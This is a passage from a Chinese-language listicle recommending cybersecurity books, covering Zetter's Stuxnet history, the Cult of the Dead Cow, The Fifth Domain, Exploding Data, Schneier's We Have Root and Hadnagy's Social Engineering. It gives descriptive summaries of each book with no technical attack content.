《零日倒计时》由《连线》杂志资深作者Kim Zetter所著,该书不仅详细介绍了Stuxnet(“震网”病毒,破坏了伊朗核设施)的计划、执行和发现过程,还超脱震网病毒本身,讨论了数字战在美国的演变过程。

这一如今被我们命名为“Stuxnet”(震网)的病毒与当时已知的任何病毒都不同,因为其目的并不在试图窃取任何有价值信息,而在于破坏计算机控制的物理核设备。通过文字的魅力,Zetter仿佛将读者带回Stuxnet刚刚释放时的文化和政治氛围之中,此外,作者还解释了该数字武器的设计和部署方式,以及安全专家对其进行跟踪发现的全过程。最后,作者在更广泛的层面上揭示了由于情报机构和政府需求而催生和发展的恶意代码销售市场,以及当今的关键系统是如何易受Stuxnet攻击影响的。

4. 《死牛崇拜:最初的超级黑客组织如何拯救世界》(Cult of the Dead Cow: How the Original Hacking Supergroup Might Just Save the World)

——作者:约瑟夫·门恩(Joseph Menn)

 CultoftheDeadCow.jpg

在最古老、最受尊敬的美国黑客组织中有这样一个震耳欲聋的名字——“死牛崇拜”( Cult of the Dead Cow,简称cDc)。

“死牛崇拜”黑客组织于1984年6月在德克萨斯州成立,该组织在黑客界率先倡议通过黑客技术干扰他国内政、介入国家安全,并历史性地发布了远程控制类特种木马。“死牛崇拜”于1996年提出“黑客行动主义”(Hacktivism),即依靠网络入侵表达自己的政见。之后,其“黑客行动主义者”们在国际互联网上发动了一系列网络攻击活动,通过入侵网站等发布信息,来表达他们对与其理念不符的国家和企业的不满。而另一个让“死牛崇拜”名扬天下的事迹,就是其发布的黑客工具Back Orifice,这个工具普遍被看成各类APT攻击中特种木马的鼻祖,很具有标志性,甚至可以说没有“死牛崇拜”,就不会有之后的APT。

在《死牛崇拜》一书中,路透社记者约瑟夫·门恩(Joseph Menn)详细追溯了该组织的历史——从其最初于德克萨斯州成立到其成员(他们中大多数人始终保持匿名)的生活和职业。目前已知的该组织成员包括德克萨斯州前国会议员Beto O'Rourke,Peiter“ Mudge” Zatko(后来为DARPA和Google工作),以及企业高管和政府顾问。

除了分享该组织的发展历程和道德黑客项目外,作者还解释了“面对面”形式的成员聚会需求是如何为我们如今的安全会议奠定基础的。时至今日,“死牛崇拜”组织成员及其追随者已经将重点放在了提高数据安全性和消除虚假消息等方面。这一点,值得我们学习!

5. 《第五领域:在网络威胁时代捍卫我们的国家、公司和自身安全》(The Fifth Domain: Defending Our Country, Our Companies, and Ourselves in the Age of Cyber Threats)

——作者:理查德A·克拉克(Richard A. Clarke),罗伯特·K·纳克(Robert K. Knake)

 TheFifthDomain.jpg

《第五领域》的作者理查德·克拉克(Richard Clarke)和罗伯特·纳克(Robert Knake)写道,我们生活在一个在线威胁具有现实世界影响的时代,但这并不意味着网络犯罪分子占据了上风。如今,企业和政府机构可以更好地了解如何防御攻击并降低网络空间的危险。

该书是关于网络空间的——五角大楼将其称为“第五领域/空间”,与陆地、海洋、天空和太空并列在战争领域清单之上。Clarke和 Knake向读者介绍了企业或政府高管、科学家以及公务人员正在花时间学习公共和私营部门如何与网络犯罪分子作斗争的知识。除此之外,他们还描述了创建计算机武器的量子计算实验室,以及遭到黑客入侵的公司董事会(以及少数没有被黑客入侵的企业)等等内容。

最后,在描述网络空间的来龙去脉过程中,Clarke和 Knake还阐述了只要具备强有力的捍卫能力,第五领域一样可以成为人类进步的工具。

6. 《爆炸性数据:在数字时代恢复我们的网络安全》(Exploding Data: Reclaiming Our Cyber Security in the Digital Age)

——作者:迈克尔·切尔托夫(Michael Chertoff)

 ExplodingData.jpg

在《爆炸性数据》一书中,迈克尔·切尔托夫(Michael Chertoff)提出了一个很多人都知道但却很少去讨论的一个主题:全球企业、政府和攻击对手所捕获、存储以及使用的大量个人数据问题。作者认为,我们面临的最大威胁不是物理威胁而是虚拟威胁,因为人们无法控制Web上传播的爆炸性个人数据量。

Chertoff解释了有关数据保护的法律和政策是如何在较早的时期制定的,而不是针对互联网时代而定制的。尽管可以使用数据来保护那些共享它们的人,但作者仍然呼吁应该制定给更严格的标准,并以此来分析和使用数据。

作者通过数据收集演变的故事阐述了这一复杂的问题,并进一步提出了将人员、企业和政府需求考虑在内的发展方式。

7. 《我们有Root:Schneier在安全方面的更多建议》(We Have Root: Even More Advice from Schneier on Security)

——作者:布鲁斯·施耐尔(Bruce Schneier)

 WeHaveRoot.jpg

提到篮球,你可能马上会想到乔丹;提到摇滚乐,你可能第一时间想到披头士;而提到网络安全,Bruce Schneier 经常是大众媒体第一个想到的专家。《InfoSecurity》杂志称其为“安全界的巨星”。除了像其他的安全专家一样做研究、开安全公司,他还会花很多的精力来撰文、写书、编辑电子杂志,而且频频出现在各种大众媒体和安全活动中,为各国政府和公司出谋划策。在他多年的不懈努力下,原本秘不示人的先进密码算法、许多看似违反直觉的安全理论、技术和观念渐渐在世界范围内成为常识,并应用于亿万人的日常生活,他也因此被列为“世界十大科技作家之一”。

《We Have Root》一书是Schneier最新发布的论文集,该书由多篇文章组成,讨论了技术在社会各方面(包括国家安全、交通运输、政府、商业、物联网、选举、战争等)日益增长的重要性。该论文集的范围从“情报的局限性”到“泄露隐私的物联网设备”,再到“大众汽车和欺诈软件”以及“安全设计:停止试图修复用户”等等。

在这些文章以及许多其他文章中,Schneier都呼吁企业和政府领导人以及个人改善他们在安全性、隐私权和投资方面的决策。

8. 《社会工程学2:人类入侵的科学》(Social Engineering, Second Edition: The Science of Human Hacking)

——作者:克里斯托弗·哈德纳吉(Christopher Hadnagy)

 SocialEngineeringHumanHacking.jpg

社会工程师依靠人类的情感和决策,而不是直接入侵其网络的方式,来轻松地实现访问其敏感信息的需求。他们这种狡猾的入侵方式对于企业组织而言非常危险,因为这样一来,企业部署的防火墙和杀毒软件都将形同虚设。面对社会工程学,人类就是社会工程师及其正在寻找的数据之间唯一的防御。

在本书中,经验丰富的社会工程师Christopher Hadnagy将带读者了解社会工程师的绝招。他详细介绍了这些专业人员使用的一些常见策略,并列举了这些策略的实践案例,以帮助安全专业人员能够洞悉攻击的实践方式。想要了解社会工程师是如何利用人类情感大做文章,并学习如何识别、预测和阻止社会工程学攻击的从业者们,一定不要错过此书。